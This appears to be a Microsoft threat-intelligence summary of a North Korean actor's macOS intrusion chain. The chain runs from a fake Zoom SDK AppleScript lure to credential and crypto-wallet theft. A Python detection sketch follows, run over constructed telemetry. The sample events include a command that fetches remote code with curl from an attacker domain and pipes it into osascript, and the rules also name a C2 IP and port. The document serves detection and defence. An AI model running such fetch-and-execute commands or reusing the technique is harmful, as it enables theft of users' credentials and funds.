Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise
2026-04-16 • Microsoft
Microsoft attributes a macOS intrusion chain to Sapphire Sleet, a North Korean state actor focused on cryptocurrency, finance, venture capital, and blockchain targets. The campaign uses recruiter-style social engineering to make victims run a fake “Zoom SDK Update.scpt” AppleScript, then chains follow-on payloads that are fetched with curl and piped into osascript for reconnaissance, persistence, credential harvesting, TCC manipulation, and collection of wallets, browser data, keychains, Apple Notes, and Telegram data. A disguised Mach-O host-monitoring component named com.apple.cli gathers system and process information while maintaining outbound connectivity to 83.136.208[.]246:6783, alongside additional staged backdoor and credential-harvesting components. The activity matters because it shows Sapphire Sleet relying on trusted macOS utilities and user-initiated execution rather than software exploitation to bypass Gatekeeper, quarantine, notarization, and other platform controls.
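The chain above leaves behaviour that endpoint telemetry can flag without a signature for any one payload. The following is an added detection sketch, not Microsoft's code: it runs four rules over constructed macOS process and network events (the event tuple layout is an assumption), using the C2 endpoint, the lure script name, the check02id.com domain and the com.apple.cli binary name from the write-up.

```python
# Added example (not from the Microsoft write-up): behavioural checks for the
# Sapphire Sleet macOS chain, run over constructed sample telemetry.
import re

# Indicators taken from the write-up; the event layout below is constructed.
C2_ENDPOINT = ("83.136.208.246", 6783)
APPLE_SYSTEM_PATHS = ("/System/", "/usr/bin/", "/usr/libexec/", "/bin/", "/sbin/")
CURL_TO_OSASCRIPT = re.compile(r"\bcurl\b.*\|\s*osascript\b")

# Constructed sample events: (event_type, process_name, path, command_line, extra)
SAMPLE_EVENTS = [
    ("exec", "osascript", "/usr/bin/osascript",
     "osascript /Users/dev/Downloads/Zoom SDK Update.scpt", {}),
    ("exec", "sh", "/bin/sh", "sh -c 'curl -s http://check02id.com/x | osascript'", {}),
    ("exec", "com.apple.cli", "/Users/dev/Library/.hidden/com.apple.cli", "com.apple.cli", {}),
    ("net", "com.apple.cli", "/Users/dev/Library/.hidden/com.apple.cli", "",
     {"dst": "83.136.208.246", "port": 6783}),
    ("exec", "osascript", "/usr/bin/osascript", "osascript -e 'display dialog \"hi\"'", {}),
    ("net", "Safari", "/Applications/Safari.app/Contents/MacOS/Safari", "",
     {"dst": "17.253.144.10", "port": 443}),
]


def classify(event):
    """Return the names of every rule the event matches (empty list if none)."""
    kind, name, path, cmdline, extra = event
    hits = []
    # Stage-two fetch: curl output piped straight into the AppleScript interpreter.
    if kind == "exec" and CURL_TO_OSASCRIPT.search(cmdline):
        hits.append("curl_piped_to_osascript")
    # Lure execution: osascript running a .scpt that sits in the user's Downloads folder.
    if kind == "exec" and name == "osascript" and cmdline.lower().endswith(".scpt") \
            and "/Downloads/" in cmdline:
        hits.append("osascript_running_downloaded_scpt")
    # Masquerading: an Apple-style bundle id as a process name outside Apple's own paths.
    if name.startswith("com.apple.") and not path.startswith(APPLE_SYSTEM_PATHS):
        hits.append("apple_named_binary_outside_system_path")
    # Known C2: the host-monitoring component's beacon destination from the write-up.
    if kind == "net" and (extra.get("dst"), extra.get("port")) == C2_ENDPOINT:
        hits.append("known_c2_endpoint")
    return hits


def scan(events):
    """Map the index of each suspicious event to the rules it triggered."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx][1], rules)
```

The masquerading rule will also fire on legitimate third-party software that ships an Apple-style name outside system paths, so in production pair it with a code-signature check rather than treating it as a standalone alert.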
Indicators of Compromise